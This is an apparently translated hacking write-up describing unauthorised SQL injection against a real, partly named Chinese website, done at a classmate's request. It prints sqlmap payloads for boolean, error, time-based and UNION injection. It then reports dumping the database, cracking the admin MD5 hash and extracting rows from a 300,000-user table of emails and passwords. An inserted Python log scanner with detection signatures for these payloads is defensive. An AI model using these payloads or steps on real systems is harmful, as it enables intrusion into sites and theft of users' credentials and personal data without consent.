0x01 Background: a classmate asked me whether I could take down this site. I took a look: there is SQL injection, but a whitelist filter is in place.
Vulnerable page: https://xxx.cn/xxx.php?Class_ID=1&Pro_ID=69
sqlmap test:
---
Parameter: Class_ID (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: Class_ID=-3922 OR 2369=2369#&Pro_ID=69

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: Class_ID=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171786a71,(SELECT (ELT(7537=7537,1))),0x71717a7671,0x78))s), 8446744073709551610, 8446744073709551610)))&Pro_ID=69

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: Class_ID=1 AND SLEEP(5)&Pro_ID=69

    Type: UNION query
    Title: MySQL UNION query (NULL) - 27 columns
    Payload: Class_ID=1 UNION ALL SELECT CONCAT(0x7171786a71,0x454d52456452437445546c42546d51695542414d775757566478686e4168734c6d70746249706a6a,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&Pro_ID=69

Parameter: Pro_ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Class_ID=1&Pro_ID=69 AND 3511=3511

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: Class_ID=1&Pro_ID=69 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171786a71,(SELECT (ELT(7590=7590,1))),0x71717a7671,0x78))s), 8446744073709551610, 8446744073709551610)))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: Class_ID=1&Pro_ID=69 AND SLEEP(5)
---
As you can see, boolean-based blind, time-based and UNION query injection are all present; here we go with the blind injection. Let's dump the database user and database name directly.
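From the defender's side, the sqlmap output above is also a ready-made detection signature. The following Python is an added example, not part of the original writeup: it scans constructed Apache-style access-log lines (IPs, timestamps and path are made up; the request shapes mirror the payloads listed above) and flags both the known payload families and any Class_ID/Pro_ID value that is not a plain integer, which is the check the vulnerable page was evidently missing.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed log lines imitating the sqlmap probes shown above (not a real capture).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0800] "GET /xxx.php?Class_ID=1&Pro_ID=69 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0800] "GET /xxx.php?Class_ID=-3922%20OR%202369=2369%23&Pro_ID=69 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:41 +0800] "GET /xxx.php?Class_ID=1%20AND%20SLEEP(5)&Pro_ID=69 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:42 +0800] "GET /xxx.php?Class_ID=1%20UNION%20ALL%20SELECT%20CONCAT(0x7171786a71,0x41,0x71717a7671),NULL,NULL%23&Pro_ID=69 HTTP/1.1" 200 6000 "-" "Mozilla/5.0"
"""

# Apache combined format: client IP and the request target are all we need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

# Parameters the page treats as integer ids (taken from the URL above); anything else is suspect.
INTEGER_PARAMS = {"Class_ID", "Pro_ID"}

# One pattern per sqlmap payload family seen in the output above.
SIGNATURES = {
    "boolean-based": re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),   # OR 2369=2369
    "time-based": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),             # AND SLEEP(5)
    "union-query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),       # UNION ALL SELECT
    "hex-marker": re.compile(r"\b0x[0-9a-f]{8,}\b", re.I),                  # 0x7171786a71 markers
}

def classify_value(name, value):
    """Return the set of findings for one URL-decoded query parameter."""
    findings = set()
    if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value):
        findings.add("non-integer id")
    for label, pattern in SIGNATURES.items():
        if pattern.search(value):
            findings.add(label)
    return findings

def scan_log(text):
    """Return (ip, parameter, findings) for every parameter that looks injected."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query          # %23 is still encoded here
        for name, value in parse_qsl(query, keep_blank_values=True):
            findings = classify_value(name, value)          # parse_qsl decodes %20, %23
            if findings:
                hits.append((m.group("ip"), name, findings))
    return hits

if __name__ == "__main__":
    for ip, name, findings in scan_log(SAMPLE_LOG):
        print(f"{ip} {name}: {', '.join(sorted(findings))}")
```

The "non-integer id" check fires on every probe regardless of keyword, which is why strict type validation (or parameterised queries) beats a keyword whitelist for numeric parameters.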
0x02
current user: 'bbktel_www@localhost'
current database: 'bbk_tel'
0x03 Next, query the table names and column names, then query the account and password directly.
Got the back-end admin account and password.
Cracked the md5 but couldn't find the admin panel, which is the most annoying part.....
0x04 Let's see what else is in the database (PS: kids, don't copy me)
300k user records--.--columns are uid, email, username, password
Used the --start/--stop options to pull the first 50 rows as a test.
The forum page is https://www.bbktel.com.cn/bbs/